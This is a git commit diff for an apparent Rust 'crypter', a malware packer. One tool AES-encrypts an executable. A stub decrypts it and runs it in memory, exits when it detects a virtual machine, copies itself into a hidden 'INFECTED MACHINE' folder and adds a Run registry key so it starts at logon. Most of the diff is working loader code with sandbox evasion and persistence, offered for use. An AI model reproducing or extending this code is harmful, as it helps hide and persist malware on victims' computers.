Added Persistence

2023-07-14 09:33:30 -07:00 · 2023-07-14 09:33:30 -07:00 · d3e45bf0b4
commit d3e45bf0b4
parent 1d3da4b8b1
7 changed files with 104 additions and 11 deletions
--- a/crypt/hexowl.exe
+++ b/crypt/hexowl.exe
--- a/crypt/src/main.rs
+++ b/crypt/src/main.rs
@ -11,7 +11,7 @@ use rand::{RngCore, SeedableRng};

 fn main() -> std::io::Result<()> {
    // Read input file into a vector RENAME example.exe to what you want and put it in this "crypt" folder
-    let plaintext_bytes = read("example.exe").expect("Failed to read file");
+    let plaintext_bytes = read("hexowl.exe").expect("Failed to read file");

    let mut encrypted_file = File::create("encrypted_Input.bin")?;
    let mut key_file = File::create("key.txt")?;
--- a/stub/Cargo.lock
+++ b/stub/Cargo.lock
@ -4,9 +4,9 @@ version = 3

 [[package]]
 name = "aes"
-version = "0.8.2"
+version = "0.8.3"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "433cfd6710c9986c576a25ca913c39d66a6474107b406f34f91d4a8923395241"
+checksum = "ac1f845298e95f983ff1944b728ae08b8cebab80d684f0a832ed0fc74dfa27e2"
 dependencies = [
 "cfg-if",
 "cipher",
@ -31,9 +31,9 @@ dependencies = [

 [[package]]
 name = "cpufeatures"
-version = "0.2.7"
+version = "0.2.9"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "3e4c1eaa2012c47becbbad2ab175484c2a84d1185b566fb2cc5b8707343dfe58"
+checksum = "a17b76ff3a4162b0b27f354a0c87015ddad39d35f9c0c36607a3bdd175dde1f1"
 dependencies = [
 "libc",
 ]
@ -75,9 +75,9 @@ checksum = "3518e289386082220db48c380f414722e25263af4160f8577c247dae0c6f3829"

 [[package]]
 name = "libc"
-version = "0.2.144"
+version = "0.2.147"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "2b00cc1c228a6782d0f076e7b232802e0c5689d41bb5df366f2a6b6621cfdfe1"
+checksum = "b4668fb0ea861c1df094127ac5f1da3409a82116a4ba74fca2e58ef927159bb3"

 [[package]]
 name = "memexec"
@ -92,6 +92,7 @@ dependencies = [
 "aes",
 "inside-vm",
 "memexec",
+ "winreg",
 ]

 [[package]]
@ -105,3 +106,34 @@ name = "version_check"
 version = "0.9.4"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "49874b5167b65d7193b8aba1567f5c7d93d001cafc34600cee003eda787e483f"
+
+[[package]]
+name = "winapi"
+version = "0.3.9"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "5c839a674fcd7a98952e593242ea400abe93992746761e38641405d28b00f419"
+dependencies = [
+ "winapi-i686-pc-windows-gnu",
+ "winapi-x86_64-pc-windows-gnu",
+]
+
+[[package]]
+name = "winapi-i686-pc-windows-gnu"
+version = "0.4.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ac3b87c63620426dd9b991e5ce0329eff545bccbbb34f3be09ff6fb6ab51b7b6"
+
+[[package]]
+name = "winapi-x86_64-pc-windows-gnu"
+version = "0.4.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "712e227841d057c1ee1cd2fb22fa7e5a5461ae8e48fa2ca79ec42cfc1931183f"
+
+[[package]]
+name = "winreg"
+version = "0.9.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "16cdb3898397cf7f624c294948669beafaeebc5577d5ec53d0afb76633593597"
+dependencies = [
+ "winapi",
+]
--- a/stub/Cargo.toml
+++ b/stub/Cargo.toml
@ -8,4 +8,5 @@ edition = "2021"
 [dependencies]
 inside-vm = "0.2.0"
 aes = "0.8.2"
-memexec = "0.2"
+memexec = "0.2"
+winreg = "0.9"
--- a/stub/src/encrypted_Input.bin
+++ b/stub/src/encrypted_Input.bin
--- a/stub/src/key.txt
+++ b/stub/src/key.txt
@ -0,0 +1 @@
+8Η<EFBFBD>―F ιL¨OΓXώ
--- a/stub/src/main.rs
+++ b/stub/src/main.rs
@ -3,16 +3,30 @@ use aes::cipher::{BlockDecrypt, KeyInit,
    generic_array::GenericArray,
 };
 use inside_vm::inside_vm;
-use std::io::{Read, Cursor};
+use std::process::Command;
+use std::{fs, env};
+use std::io::{Read, Cursor, self};
 use std::io::Result;
+use std::path::Path;
+use winreg::enums::{HKEY_CURRENT_USER, KEY_ALL_ACCESS};
+use winreg::RegKey;


-fn main(){
+fn main() {
+
    if inside_vm(){
+
        println!("This is in a vm");
+
        std::process::exit(0);
+
    } else {
+
        println!("NO VM");
+
+        create_infected_directory();
+        persistence();
+
        let pe_bytes = decrypt_file().unwrap();
        fileless(pe_bytes);
    }
@ -45,7 +59,52 @@ fn decrypt_file() -> Result<Vec<u8>> {
    Ok(decrypted_bytes, )
 }

-fn fileless(bytes: Vec<u8>){
+fn create_infected_directory() -> io::Result<()> {
+    let infected_dir = Path::new("C:/Rust Crypter - INFECTED MACHINE");
+    fs::create_dir_all(&infected_dir)?;
+
+    let current_exe = env::current_exe()?;
+    let current_exe_filename = current_exe
+        .file_name();
+    
+    let infected_exe_path = infected_dir.join(current_exe_filename.unwrap());
+    fs::copy(&current_exe, &infected_exe_path)?;
+
+    if cfg!(target_os = "windows") {
+        Command::new("attrib")
+            .arg("+h")
+            .arg(infected_dir.as_os_str())
+            .output()?;
+        Command::new("attrib")
+            .arg("+h")
+            .arg(infected_exe_path.as_os_str())
+            .output()?;
+    }
+
+    Ok(())
+}
+
+fn persistence() -> io::Result<()> {
+
+    if let Ok(current_exe) = env::current_exe() {
+        if let Some(file_name) = current_exe.file_stem() {
+
+            let executable_name = file_name.to_string_lossy();
+            let directory_path = "C:/Rust Crypter - INFECTED MACHINE/";
+            let file_path = format!("{}{}.exe", directory_path, executable_name);
+
+            // Open the "Run" registry key
+            let hkcu = RegKey::predef(HKEY_CURRENT_USER);
+            let run_key = hkcu.open_subkey_with_flags("Software\\Microsoft\\Windows\\CurrentVersion\\Run", KEY_ALL_ACCESS)?;
+
+            // Add the executable path to the "Run" registry key
+            run_key.set_value("RustCrypter", &file_path).err();
+        }
+    }
+    Ok(())
+}
+
+fn fileless(bytes: Vec<u8>) {
    unsafe {
        memexec::memexec_exe(&bytes).unwrap();
    }